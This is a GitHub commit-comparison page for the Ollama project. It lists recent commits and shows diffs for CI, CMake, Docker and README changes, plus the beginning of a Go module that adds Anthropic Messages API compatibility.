Compare commits

..

41 Commits

Author SHA1 Message Date
jmorganca
29837c1b98 Add experimental /x/generate endpoint for image generation
This adds a new experimental endpoint /x/generate specifically for image
generation models, keeping the main /api/generate endpoint unchanged.

New endpoint:
- POST /x/generate - experimental image generation endpoint
- Supports width, height, steps parameters
- Returns progress updates and base64-encoded images
- Validates that the model supports image generation

API changes:
- Add width, height, steps parameters to GenerateRequest
- Add status, total, completed, images fields to GenerateResponse
- Add XGenerate method to api.Client for calling /x/generate

OpenAI compatibility:
- /v1/images/generations now routes through /x/generate
- Uses middleware pattern like other OpenAI endpoints
- Returns OpenAI-compatible response format with b64_json data

CLI:
- imagegen CLI now uses /x/generate via client.XGenerate()
- Supports --width, --height, --steps flags

Internal changes:
- Add XGenerateHandler to server/routes.go
- Update llm.CompletionRequest/Response with image generation fields
- Change Image field from []byte to string (base64-encoded)
- Add Steps field to CompletionRequest
- Rename Total to TotalSteps for clarity
2026-01-16 21:50:19 -08:00
Patrick Devine
a077d996e3 Fix create and show commands for experimental models (#13741)
* x: make `ollama create --experimental` import from safetensors

This change allows pulling in safetensors models into the new experimental model format, and also
fixes the `ollama show` command to be able to correctly display the model information.

* gofumpt the linter

* gofumpt the linter again

* validate the model name
2026-01-16 14:31:55 -08:00
Jeffrey Morgan
c23d5095de x/imagegen: clean up image generation code (#13725) 2026-01-16 12:19:25 -08:00
Bruce MacDonald
7601f0e93e server: reject unexpected auth hosts (#13738)
Added validation to ensure auth redirects stay on the same host as the original request. The fix is a single check in getAuthorizationToken comparing the realm URL's host against the request host. Added tests for the auth flow.

Co-Authored-By: Gecko Security <188164982+geckosecurity@users.noreply.github.com>

* gofmt

---------

Co-authored-by: Gecko Security <188164982+geckosecurity@users.noreply.github.com>
2026-01-16 14:10:36 -05:00
Eva H
aad3f03890 app: allow macOS app to terminate during system shutdown (#13737) 2026-01-16 09:05:04 -05:00
Gyungrai Wang
55d0b6e8b9 integration: fix tools_test.go for ToolCallFunctionArguments API change (#13731) 2026-01-15 16:08:09 -08:00
Devon Rifkin
38eac40d56 openai: tweak v1/responses to conform better (#13736)
* openai: tweak v1/responses to conform better

* openai: provide better error for image URLs

* lint
2026-01-15 15:46:36 -08:00
Jeffrey Morgan
80f3f1bc25 readme: add instructions to build with MLX (#13733) 2026-01-15 11:03:52 -08:00
Parth Sareen
b1a0db547b docs: add env var needed for claude code in docs (#13721) 2026-01-15 10:11:00 -08:00
Parth Sareen
75d7b5f926 cmd: enable multi-line input and shift enter (#13694) 2026-01-14 17:52:46 -08:00
vincent d warmerdam
349d814814 docs: add marimo integration (#13326)
* docs added

* fix title

* add marimo to docs.json

---------

Co-authored-by: Devon Rifkin <drifkin@drifkin.net>
2026-01-14 17:37:38 -08:00
Yuhong Sun
c8743031e0 docs: add onyx integration (#13135)
* Ready for team review

* Update docs/integrations/onyx.mdx

Co-authored-by: Jeffrey Morgan <jmorganca@gmail.com>

* update docs.json

---------

Co-authored-by: Jeffrey Morgan <jmorganca@gmail.com>
Co-authored-by: Devon Rifkin <drifkin@drifkin.net>
2026-01-14 17:32:05 -08:00
Jeffrey Morgan
4adb9cf4bb scripts: fix macOS auto-update signature verification failure (#13713)
Add --norsrc flag to ditto commands when creating Ollama-darwin.zip
to exclude AppleDouble resource fork files (._* files) from the archive.

The mlx.metallib file has extended attributes, which causes ditto to
include a ._mlx.metallib AppleDouble file in the zip. Since this file
is not part of the code signature seal, macOS rejects the bundle during
auto-update verification with:

  "a sealed resource is missing or invalid"
  "file added: .../._mlx.metallib"

The --norsrc flag prevents ditto from preserving resource forks and
extended attributes, ensuring only signed files are included in the
release archive.
2026-01-14 07:48:10 -08:00
Daniel Hiltgen
74f475e735 Revert "Documentation edits made through Mintlify web editor" (#13688)
This reverts commit c6d4c0c7f2.

Merge after 0.14.0 ships for the updated Linux documentation.
2026-01-14 07:42:34 -08:00
Maternion
875cecba74 docs: update default context window size to 4096 tokens (#13709) 2026-01-14 01:01:28 -08:00
Josh Daniel Bañares
7d411a4686 docs: update web search param in examples (#13711) 2026-01-14 00:38:39 -08:00
Daniel Hiltgen
02a2401596 mlx: bundle openblas dependency (#13706) 2026-01-13 15:29:47 -08:00
Daniel Hiltgen
e4b488a7b5 CI: dedup cuda libraries to reduce payload size (#13704) 2026-01-13 11:25:31 -08:00
Daniel Hiltgen
98079ddd79 ci: add missing mlx components to release build (#13702) 2026-01-13 09:13:09 -08:00
Jeffrey Morgan
d70942f47b x/imagegen/cli: skip local model check (#13699) 2026-01-12 22:38:10 -08:00
Jeffrey Morgan
58e4701557 scripts: increase notarization timeout to 20m (#13697)
The 100MB mlx.metallib file significantly increased the app bundle size,
causing Apple's notarization service to timeout with the previous 10m limit.
2026-01-12 20:38:38 -08:00
Jeffrey Morgan
dbf47ee55a cmake: use CMAKE_SYSTEM_PROCESSOR instead of CMAKE_OSX_ARCHITECTURES for mlx.metallib install (#13696)
The CMake condition for installing mlx.metallib checks
CMAKE_OSX_ARCHITECTURES, but this variable is only set when explicitly
passed - not auto-detected. The arm64 build was missing this flag,
causing the metallib to not be installed, which then caused codesign
to fail on the unexpanded glob pattern.
2026-01-12 20:05:11 -08:00
Jeffrey Morgan
af7ea6e96e x/imagegen: install mlx.metallib and fix macOS rpath handling, add mlx library directories to LD_LIBRARY_PATH (#13695)
- Install mlx.metallib for arm64 builds (required for Metal GPU acceleration)
- Apply rpath settings to all macOS builds, not just x86_64
- Add CMAKE_BUILD_WITH_INSTALL_RPATH to avoid install_name_tool errors
- Update build_darwin.sh to copy, sign, and package the metallib
2026-01-12 19:03:11 -08:00
Jeffrey Morgan
8f1e0140e7 x/imagegen: fix mlx build in Dockerfile and macOS build script (#13693) 2026-01-12 15:52:43 -08:00
Parth Sareen
35c3c9e3c2 anthropic: allow non-thinking models when using Anthropic API (#13692) 2026-01-12 15:13:26 -08:00
Parth Sareen
d06acbcb19 x/cmd: enable web search and web fetch with flag (#13690) 2026-01-12 13:59:40 -08:00
Jeffrey Morgan
9667c2282f x/imagegen: add naive TeaCache and FP8 quantization support (#13683)
TeaCache:
- Timestep embedding similarity caching for diffusion models
- Polynomial rescaling with configurable thresholds
- Reduces transformer forward passes by ~30-50%

FP8 quantization:
- Support for FP8 quantized models (8-bit weights with scales)
- QuantizedMatmul on Metal, Dequantize on CUDA
- Client-side quantization via ollama create --quantize fp8

Other bug fixes:
- Fix `/api/show` API for image generation models
- Server properly returns model info (architecture, parameters, quantization)
- Memory allocation optimizations
- CLI improvements for image generation
2026-01-12 13:45:22 -08:00
Jeffrey Morgan
a937a68317 server: fix slow 'ollama rm' of models with many layers (#13680)
RemoveLayers was calling Manifests() for each layer to check if it was
shared with other models. For models with many blobs (e.g., tensor
models), this caused O(N*M) manifest reads.

Now loads manifests once and builds a set of in-use digests.
2026-01-12 13:17:48 -08:00
Parth Sareen
2185112d84 x/cmd: connect /set flags to behavior in experimental mode (#13684) 2026-01-12 00:40:44 -08:00
Parth Sareen
91926601dc x: add missing /set, /show, /load, /save commands to experimental mode (#13682) 2026-01-11 23:12:31 -08:00
Jeffrey Morgan
361d6c16c2 x/imagegen/transfer: fix timeout and progress reporting (#13679)
Removes 5-minute HTTP client timeout that caused "context deadline
exceeded" errors on large file downloads. Stall detection (10s)
already handles unresponsive connections.

Fixes progress bar total going down on resume by calculating total
from all blobs upfront and reporting already-downloaded bytes
as completed immediately.
2026-01-11 15:33:53 -08:00
Patrick Devine
7e2496e88e Fix cmake install command in README (#13678)
Update installation command for MLX component in README.
2026-01-11 13:16:42 -08:00
WhatToPutHere
5b84e29882 docs: fix troubleshooting page (#13674)
Updated the link in the log output description to point to the correct troubleshooting guide format.
2026-01-11 00:58:07 -08:00
Jeffrey Morgan
7cc2a653f2 dockerfile: remove unused COPY command (#13664) 2026-01-09 23:07:15 -08:00
Jeffrey Morgan
2584940016 Add z-image image generation prototype (#13659) 2026-01-09 21:09:46 -08:00
Michael
c6d4c0c7f2 Documentation edits made through Mintlify web editor 2026-01-09 21:29:03 -05:00
Parth Sareen
1ef4241727 x: request access for all commands, add welcome message (#13662) 2026-01-09 18:20:39 -08:00
Parth Sareen
68fafd3002 x: improve approval selector with clearer labels (#13663) 2026-01-09 17:08:12 -08:00
Parth Sareen
2b2cda7a2b api: implement anthropic api (#13600)
* api: add Anthropic Messages API compatibility layer

Add middleware to support the Anthropic Messages API format at /v1/messages.
This enables tools like Claude Code to work with Ollama local and cloud models through the
Anthropic API interface.
2026-01-09 11:53:36 -08:00
Daniel Hiltgen
3cfe9fe146 docker: add missing deps (#13654)
The new MLX library has extra dependencies.
2026-01-09 07:34:40 -08:00
Parth Sareen
a23b559b4c x: disable web search tool registration (#13656) 2026-01-09 01:42:20 -08:00
107 changed files with 14578 additions and 823 deletions

View File

@@ -13,7 +13,7 @@ body:
id: logs
attributes:
label: Relevant log output
description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.md#how-to-troubleshoot-issues) for details.
description: Please copy and paste any relevant log output. See [Troubleshooting Guide](https://github.com/ollama/ollama/blob/main/docs/troubleshooting.mdx#how-to-troubleshoot-issues) for details.
render: shell
validations:
required: false

View File

@@ -372,13 +372,17 @@ jobs:
outputs: type=local,dest=dist/${{ matrix.os }}-${{ matrix.arch }}
cache-from: type=registry,ref=${{ vars.DOCKER_REPO }}:latest
cache-to: type=inline
- name: Deduplicate CUDA libraries
run: |
./scripts/deduplicate_cuda_libs.sh dist/${{ matrix.os }}-${{ matrix.arch }}
- run: |
for COMPONENT in bin/* lib/ollama/*; do
case "$COMPONENT" in
bin/ollama) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
bin/ollama*) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
lib/ollama/*.so*) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
lib/ollama/cuda_v*) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
lib/ollama/vulkan*) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
lib/ollama/mlx*) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}.tar.in ;;
lib/ollama/cuda_jetpack5) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack5.tar.in ;;
lib/ollama/cuda_jetpack6) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-jetpack6.tar.in ;;
lib/ollama/rocm) echo $COMPONENT >>ollama-${{ matrix.os }}-${{ matrix.arch }}-rocm.tar.in ;;

View File

@@ -48,9 +48,10 @@ if((CMAKE_OSX_ARCHITECTURES AND NOT CMAKE_OSX_ARCHITECTURES MATCHES "arm64")
set(GGML_CPU_ALL_VARIANTS ON)
endif()
if (CMAKE_OSX_ARCHITECTURES MATCHES "x86_64")
if(APPLE)
set(CMAKE_BUILD_RPATH "@loader_path")
set(CMAKE_INSTALL_RPATH "@loader_path")
set(CMAKE_BUILD_WITH_INSTALL_RPATH ON)
endif()
set(OLLAMA_BUILD_DIR ${CMAKE_BINARY_DIR}/lib/ollama)
@@ -189,13 +190,21 @@ if(MLX_ENGINE)
install(TARGETS mlx mlxc
RUNTIME_DEPENDENCIES
DIRECTORIES ${CUDAToolkit_BIN_DIR} ${CUDAToolkit_BIN_DIR}/x64 ${CUDAToolkit_LIBRARY_DIR}
PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc cudnn nccl
PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc nvrtc-builtins cudnn nccl openblas gfortran
PRE_EXCLUDE_REGEXES ".*"
RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
FRAMEWORK DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
)
# Install the Metal library for macOS arm64 (must be colocated with the binary)
# Metal backend is only built for arm64, not x86_64
if(APPLE AND CMAKE_SYSTEM_PROCESSOR STREQUAL "arm64")
install(FILES ${CMAKE_BINARY_DIR}/_deps/mlx-build/mlx/backend/metal/kernels/mlx.metallib
DESTINATION ${OLLAMA_INSTALL_DIR}
COMPONENT MLX)
endif()
# Manually install cudart and cublas since they might not be picked up as direct dependencies
if(CUDAToolkit_FOUND)
file(GLOB CUDART_LIBS

View File

@@ -161,10 +161,9 @@ ARG GOFLAGS="'-ldflags=-w -s'"
ENV CGO_ENABLED=1
ARG CGO_CFLAGS
ARG CGO_CXXFLAGS
# TODO wire up the actual MLX engine here instead of building the main binary...
RUN mkdir -p dist/bin
RUN go build -tags mlx -trimpath -buildmode=pie -o dist/bin/imagegen ./x/imagegen/cmd/engine
RUN --mount=type=cache,target=/root/.cache/go-build \
go build -tags mlx -trimpath -buildmode=pie -o dist/bin/ollama-mlx .
FROM base AS build
WORKDIR /go/src/github.com/ollama/ollama
@@ -205,7 +204,7 @@ COPY --from=build /bin/ollama /bin/ollama
FROM ubuntu:24.04
RUN apt-get update \
&& apt-get install -y ca-certificates libvulkan1 \
&& apt-get install -y ca-certificates libvulkan1 libopenblas0 \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
COPY --from=archive /bin /usr/bin

View File

@@ -48,7 +48,7 @@ ollama run gemma3
## Model library
Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library 'ollama model library')
Ollama supports a list of models available on [ollama.com/library](https://ollama.com/library "ollama model library")
Here are some example models that can be downloaded:
@@ -79,7 +79,7 @@ Here are some example models that can be downloaded:
| Code Llama | 7B | 3.8GB | `ollama run codellama` |
| Llama 2 Uncensored | 7B | 3.8GB | `ollama run llama2-uncensored` |
| LLaVA | 7B | 4.5GB | `ollama run llava` |
| Granite-3.3 | 8B | 4.9GB | `ollama run granite3.3` |
| Granite-3.3 | 8B | 4.9GB | `ollama run granite3.3` |
> [!NOTE]
> You should have at least 8 GB of RAM available to run the 7B models, 16 GB to run the 13B models, and 32 GB to run the 33B models.
@@ -260,6 +260,38 @@ Finally, in a separate shell, run a model:
./ollama run llama3.2
```
## Building with MLX (experimental)
First build the MLX libraries:
```shell
cmake --preset MLX
cmake --build --preset MLX --parallel
cmake --install build --component MLX
```
Next, build the `ollama-mlx` binary, which is a separate build of the Ollama runtime with MLX support enabled (needs to be in the same directory as `ollama`):
```shell
go build -tags mlx -o ollama-mlx .
```
Finally, start the server:
```
./ollama serve
```
### Building MLX with CUDA
When building with CUDA, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with default architectures:
```shell
cmake --preset 'MLX CUDA 13'
cmake --build --preset 'MLX CUDA 13' --parallel
cmake --install build --component MLX
```
## REST API
Ollama has a REST API for running and managing models.
@@ -290,6 +322,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
### Web & Desktop
- [Onyx](https://github.com/onyx-dot-app/onyx)
- [Open WebUI](https://github.com/open-webui/open-webui)
- [SwiftChat (macOS with ReactNative)](https://github.com/aws-samples/swift-chat)
- [Enchanted (macOS native)](https://github.com/AugustDev/enchanted)
@@ -421,7 +454,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
- [AppFlowy](https://github.com/AppFlowy-IO/AppFlowy) (AI collaborative workspace with Ollama, cross-platform and self-hostable)
- [Lumina](https://github.com/cushydigit/lumina.git) (A lightweight, minimal React.js frontend for interacting with Ollama servers)
- [Tiny Notepad](https://pypi.org/project/tiny-notepad) (A lightweight, notepad-like interface to chat with ollama available on PyPI)
- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.)
- [macLlama (macOS native)](https://github.com/hellotunamayo/macLlama) (A native macOS GUI application for interacting with Ollama models, featuring a chat interface.)
- [GPTranslate](https://github.com/philberndt/GPTranslate) (A fast and lightweight, AI powered desktop translation application written with Rust and Tauri. Features real-time translation with OpenAI/Azure/Ollama.)
- [ollama launcher](https://github.com/NGC13009/ollama-launcher) (A launcher for Ollama, aiming to provide users with convenient functions such as ollama server launching, management, or configuration.)
- [ai-hub](https://github.com/Aj-Seven/ai-hub) (AI Hub supports multiple models via API keys and Chat support via Ollama API.)
@@ -493,7 +526,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
### Database
- [pgai](https://github.com/timescale/pgai) - PostgreSQL as a vector database (Create and search embeddings from Ollama models using pgvector)
- [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
- [Get started guide](https://github.com/timescale/pgai/blob/main/docs/vectorizer-quick-start.md)
- [MindsDB](https://github.com/mindsdb/mindsdb/blob/staging/mindsdb/integrations/handlers/ollama_handler/README.md) (Connects Ollama models with nearly 200 data platforms and apps)
- [chromem-go](https://github.com/philippgille/chromem-go/blob/v0.5.0/embed_ollama.go) with [example](https://github.com/philippgille/chromem-go/tree/v0.5.0/examples/rag-wikipedia-ollama)
- [Kangaroo](https://github.com/dbkangaroo/kangaroo) (AI-powered SQL client and admin tool for popular databases)
@@ -636,6 +669,7 @@ See the [API documentation](./docs/api.md) for all endpoints.
- [llama.cpp](https://github.com/ggml-org/llama.cpp) project founded by Georgi Gerganov.
### Observability
- [Opik](https://www.comet.com/docs/opik/cookbook/ollama) is an open-source platform to debug, evaluate, and monitor your LLM applications, RAG systems, and agentic workflows with comprehensive tracing, automated evaluations, and production-ready dashboards. Opik supports native integration to Ollama.
- [Lunary](https://lunary.ai/docs/integrations/ollama) is the leading open-source LLM observability platform. It provides a variety of enterprise-grade features such as real-time analytics, prompt templates management, PII masking, and comprehensive agent tracing.
- [OpenLIT](https://github.com/openlit/openlit) is an OpenTelemetry-native tool for monitoring Ollama Applications & GPUs using traces and metrics.
@@ -644,4 +678,5 @@ See the [API documentation](./docs/api.md) for all endpoints.
- [MLflow Tracing](https://mlflow.org/docs/latest/llms/tracing/index.html#automatic-tracing) is an open source LLM observability tool with a convenient API to log and visualize traces, making it easy to debug and evaluate GenAI applications.
### Security
- [Ollama Fortress](https://github.com/ParisNeo/ollama_proxy_server)

778
anthropic/anthropic.go Normal file
View File

@@ -0,0 +1,778 @@
package anthropic
import (
"crypto/rand"
"encoding/base64"
"encoding/json"
"errors"
"fmt"
"log/slog"
"net/http"
"strings"
"time"
"github.com/ollama/ollama/api"
)
// Error types matching Anthropic API
type Error struct {
Type string `json:"type"`
Message string `json:"message"`
}
type ErrorResponse struct {
Type string `json:"type"` // always "error"
Error Error `json:"error"`
RequestID string `json:"request_id,omitempty"`
}
// NewError creates a new ErrorResponse with the appropriate error type based on HTTP status code
func NewError(code int, message string) ErrorResponse {
var etype string
switch code {
case http.StatusBadRequest:
etype = "invalid_request_error"
case http.StatusUnauthorized:
etype = "authentication_error"
case http.StatusForbidden:
etype = "permission_error"
case http.StatusNotFound:
etype = "not_found_error"
case http.StatusTooManyRequests:
etype = "rate_limit_error"
case http.StatusServiceUnavailable, 529:
etype = "overloaded_error"
default:
etype = "api_error"
}
return ErrorResponse{
Type: "error",
Error: Error{Type: etype, Message: message},
RequestID: generateID("req"),
}
}
// Request types
// MessagesRequest represents an Anthropic Messages API request
type MessagesRequest struct {
Model string `json:"model"`
MaxTokens int `json:"max_tokens"`
Messages []MessageParam `json:"messages"`
System any `json:"system,omitempty"` // string or []ContentBlock
Stream bool `json:"stream,omitempty"`
Temperature *float64 `json:"temperature,omitempty"`
TopP *float64 `json:"top_p,omitempty"`
TopK *int `json:"top_k,omitempty"`
StopSequences []string `json:"stop_sequences,omitempty"`
Tools []Tool `json:"tools,omitempty"`
ToolChoice *ToolChoice `json:"tool_choice,omitempty"`
Thinking *ThinkingConfig `json:"thinking,omitempty"`
Metadata *Metadata `json:"metadata,omitempty"`
}
// MessageParam represents a message in the request
type MessageParam struct {
Role string `json:"role"` // "user" or "assistant"
Content any `json:"content"` // string or []ContentBlock
}
// ContentBlock represents a content block in a message.
// Text and Thinking use pointers so they serialize as the field being present (even if empty)
// only when set, which is required for SDK streaming accumulation.
type ContentBlock struct {
Type string `json:"type"` // text, image, tool_use, tool_result, thinking
// For text blocks - pointer so field only appears when set (SDK requires it for accumulation)
Text *string `json:"text,omitempty"`
// For image blocks
Source *ImageSource `json:"source,omitempty"`
// For tool_use blocks
ID string `json:"id,omitempty"`
Name string `json:"name,omitempty"`
Input any `json:"input,omitempty"`
// For tool_result blocks
ToolUseID string `json:"tool_use_id,omitempty"`
Content any `json:"content,omitempty"` // string or []ContentBlock
IsError bool `json:"is_error,omitempty"`
// For thinking blocks - pointer so field only appears when set (SDK requires it for accumulation)
Thinking *string `json:"thinking,omitempty"`
Signature string `json:"signature,omitempty"`
}
// ImageSource represents the source of an image
type ImageSource struct {
Type string `json:"type"` // "base64" or "url"
MediaType string `json:"media_type,omitempty"`
Data string `json:"data,omitempty"`
URL string `json:"url,omitempty"`
}
// Tool represents a tool definition
type Tool struct {
Type string `json:"type,omitempty"` // "custom" for user-defined tools
Name string `json:"name"`
Description string `json:"description,omitempty"`
InputSchema json.RawMessage `json:"input_schema,omitempty"`
}
// ToolChoice controls how the model uses tools
type ToolChoice struct {
Type string `json:"type"` // "auto", "any", "tool", "none"
Name string `json:"name,omitempty"`
DisableParallelToolUse bool `json:"disable_parallel_tool_use,omitempty"`
}
// ThinkingConfig controls extended thinking
type ThinkingConfig struct {
Type string `json:"type"` // "enabled" or "disabled"
BudgetTokens int `json:"budget_tokens,omitempty"`
}
// Metadata for the request
type Metadata struct {
UserID string `json:"user_id,omitempty"`
}
// Response types
// MessagesResponse represents an Anthropic Messages API response
type MessagesResponse struct {
ID string `json:"id"`
Type string `json:"type"` // "message"
Role string `json:"role"` // "assistant"
Model string `json:"model"`
Content []ContentBlock `json:"content"`
StopReason string `json:"stop_reason,omitempty"`
StopSequence string `json:"stop_sequence,omitempty"`
Usage Usage `json:"usage"`
}
// Usage contains token usage information
type Usage struct {
InputTokens int `json:"input_tokens"`
OutputTokens int `json:"output_tokens"`
}
// Streaming event types
// MessageStartEvent is sent at the start of streaming
type MessageStartEvent struct {
Type string `json:"type"` // "message_start"
Message MessagesResponse `json:"message"`
}
// ContentBlockStartEvent signals the start of a content block
type ContentBlockStartEvent struct {
Type string `json:"type"` // "content_block_start"
Index int `json:"index"`
ContentBlock ContentBlock `json:"content_block"`
}
// ContentBlockDeltaEvent contains incremental content updates
type ContentBlockDeltaEvent struct {
Type string `json:"type"` // "content_block_delta"
Index int `json:"index"`
Delta Delta `json:"delta"`
}
// Delta represents an incremental update
type Delta struct {
Type string `json:"type"` // "text_delta", "input_json_delta", "thinking_delta", "signature_delta"
Text string `json:"text,omitempty"`
PartialJSON string `json:"partial_json,omitempty"`
Thinking string `json:"thinking,omitempty"`
Signature string `json:"signature,omitempty"`
}
// ContentBlockStopEvent signals the end of a content block
type ContentBlockStopEvent struct {
Type string `json:"type"` // "content_block_stop"
Index int `json:"index"`
}
// MessageDeltaEvent contains updates to the message
type MessageDeltaEvent struct {
Type string `json:"type"` // "message_delta"
Delta MessageDelta `json:"delta"`
Usage DeltaUsage `json:"usage"`
}
// MessageDelta contains stop information
type MessageDelta struct {
StopReason string `json:"stop_reason,omitempty"`
StopSequence string `json:"stop_sequence,omitempty"`
}
// DeltaUsage contains cumulative token usage
type DeltaUsage struct {
OutputTokens int `json:"output_tokens"`
}
// MessageStopEvent signals the end of the message
type MessageStopEvent struct {
Type string `json:"type"` // "message_stop"
}
// PingEvent is a keepalive event
type PingEvent struct {
Type string `json:"type"` // "ping"
}
// StreamErrorEvent is an error during streaming
type StreamErrorEvent struct {
Type string `json:"type"` // "error"
Error Error `json:"error"`
}
// FromMessagesRequest converts an Anthropic MessagesRequest to an Ollama api.ChatRequest
func FromMessagesRequest(r MessagesRequest) (*api.ChatRequest, error) {
var messages []api.Message
if r.System != nil {
switch sys := r.System.(type) {
case string:
if sys != "" {
messages = append(messages, api.Message{Role: "system", Content: sys})
}
case []any:
// System can be an array of content blocks
var content strings.Builder
for _, block := range sys {
if blockMap, ok := block.(map[string]any); ok {
if blockMap["type"] == "text" {
if text, ok := blockMap["text"].(string); ok {
content.WriteString(text)
}
}
}
}
if content.Len() > 0 {
messages = append(messages, api.Message{Role: "system", Content: content.String()})
}
}
}
for _, msg := range r.Messages {
converted, err := convertMessage(msg)
if err != nil {
return nil, err
}
messages = append(messages, converted...)
}
options := make(map[string]any)
options["num_predict"] = r.MaxTokens
if r.Temperature != nil {
options["temperature"] = *r.Temperature
}
if r.TopP != nil {
options["top_p"] = *r.TopP
}
if r.TopK != nil {
options["top_k"] = *r.TopK
}
if len(r.StopSequences) > 0 {
options["stop"] = r.StopSequences
}
var tools api.Tools
for _, t := range r.Tools {
tool, err := convertTool(t)
if err != nil {
return nil, err
}
tools = append(tools, tool)
}
var think *api.ThinkValue
if r.Thinking != nil && r.Thinking.Type == "enabled" {
think = &api.ThinkValue{Value: true}
}
stream := r.Stream
return &api.ChatRequest{
Model: r.Model,
Messages: messages,
Options: options,
Stream: &stream,
Tools: tools,
Think: think,
}, nil
}
// convertMessage converts an Anthropic MessageParam to Ollama api.Message(s)
func convertMessage(msg MessageParam) ([]api.Message, error) {
var messages []api.Message
role := strings.ToLower(msg.Role)
switch content := msg.Content.(type) {
case string:
messages = append(messages, api.Message{Role: role, Content: content})
case []any:
var textContent strings.Builder
var images []api.ImageData
var toolCalls []api.ToolCall
var thinking string
var toolResults []api.Message
for _, block := range content {
blockMap, ok := block.(map[string]any)
if !ok {
return nil, errors.New("invalid content block format")
}
blockType, _ := blockMap["type"].(string)
switch blockType {
case "text":
if text, ok := blockMap["text"].(string); ok {
textContent.WriteString(text)
}
case "image":
source, ok := blockMap["source"].(map[string]any)
if !ok {
return nil, errors.New("invalid image source")
}
sourceType, _ := source["type"].(string)
if sourceType == "base64" {
data, _ := source["data"].(string)
decoded, err := base64.StdEncoding.DecodeString(data)
if err != nil {
return nil, fmt.Errorf("invalid base64 image data: %w", err)
}
images = append(images, decoded)
} else {
return nil, fmt.Errorf("invalid image source type: %s. Only base64 images are supported.", sourceType)
}
// URL images would need to be fetched - skip for now
case "tool_use":
id, ok := blockMap["id"].(string)
if !ok {
return nil, errors.New("tool_use block missing required 'id' field")
}
name, ok := blockMap["name"].(string)
if !ok {
return nil, errors.New("tool_use block missing required 'name' field")
}
tc := api.ToolCall{
ID: id,
Function: api.ToolCallFunction{
Name: name,
},
}
if input, ok := blockMap["input"].(map[string]any); ok {
tc.Function.Arguments = mapToArgs(input)
}
toolCalls = append(toolCalls, tc)
case "tool_result":
toolUseID, _ := blockMap["tool_use_id"].(string)
var resultContent string
switch c := blockMap["content"].(type) {
case string:
resultContent = c
case []any:
for _, cb := range c {
if cbMap, ok := cb.(map[string]any); ok {
if cbMap["type"] == "text" {
if text, ok := cbMap["text"].(string); ok {
resultContent += text
}
}
}
}
}
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: resultContent,
ToolCallID: toolUseID,
})
case "thinking":
if t, ok := blockMap["thinking"].(string); ok {
thinking = t
}
}
}
if textContent.Len() > 0 || len(images) > 0 || len(toolCalls) > 0 || thinking != "" {
m := api.Message{
Role: role,
Content: textContent.String(),
Images: images,
ToolCalls: toolCalls,
Thinking: thinking,
}
messages = append(messages, m)
}
// Add tool results as separate messages
messages = append(messages, toolResults...)
default:
return nil, fmt.Errorf("invalid message content type: %T", content)
}
return messages, nil
}
// convertTool converts an Anthropic Tool to an Ollama api.Tool
func convertTool(t Tool) (api.Tool, error) {
var params api.ToolFunctionParameters
if len(t.InputSchema) > 0 {
if err := json.Unmarshal(t.InputSchema, &params); err != nil {
return api.Tool{}, fmt.Errorf("invalid input_schema for tool %q: %w", t.Name, err)
}
}
return api.Tool{
Type: "function",
Function: api.ToolFunction{
Name: t.Name,
Description: t.Description,
Parameters: params,
},
}, nil
}
// ToMessagesResponse converts an Ollama api.ChatResponse to an Anthropic MessagesResponse
func ToMessagesResponse(id string, r api.ChatResponse) MessagesResponse {
var content []ContentBlock
if r.Message.Thinking != "" {
content = append(content, ContentBlock{
Type: "thinking",
Thinking: ptr(r.Message.Thinking),
})
}
if r.Message.Content != "" {
content = append(content, ContentBlock{
Type: "text",
Text: ptr(r.Message.Content),
})
}
for _, tc := range r.Message.ToolCalls {
content = append(content, ContentBlock{
Type: "tool_use",
ID: tc.ID,
Name: tc.Function.Name,
Input: tc.Function.Arguments,
})
}
stopReason := mapStopReason(r.DoneReason, len(r.Message.ToolCalls) > 0)
return MessagesResponse{
ID: id,
Type: "message",
Role: "assistant",
Model: r.Model,
Content: content,
StopReason: stopReason,
Usage: Usage{
InputTokens: r.Metrics.PromptEvalCount,
OutputTokens: r.Metrics.EvalCount,
},
}
}
// mapStopReason converts Ollama done_reason to Anthropic stop_reason
func mapStopReason(reason string, hasToolCalls bool) string {
if hasToolCalls {
return "tool_use"
}
switch reason {
case "stop":
return "end_turn"
case "length":
return "max_tokens"
default:
if reason != "" {
return "stop_sequence"
}
return ""
}
}
// StreamConverter manages state for converting Ollama streaming responses to Anthropic format
type StreamConverter struct {
ID string
Model string
firstWrite bool
contentIndex int
inputTokens int
outputTokens int
thinkingStarted bool
thinkingDone bool
textStarted bool
toolCallsSent map[string]bool
}
func NewStreamConverter(id, model string) *StreamConverter {
return &StreamConverter{
ID: id,
Model: model,
firstWrite: true,
toolCallsSent: make(map[string]bool),
}
}
// StreamEvent represents a streaming event to be sent to the client
type StreamEvent struct {
Event string
Data any
}
// Process converts an Ollama ChatResponse to Anthropic streaming events
func (c *StreamConverter) Process(r api.ChatResponse) []StreamEvent {
var events []StreamEvent
if c.firstWrite {
c.firstWrite = false
c.inputTokens = r.Metrics.PromptEvalCount
events = append(events, StreamEvent{
Event: "message_start",
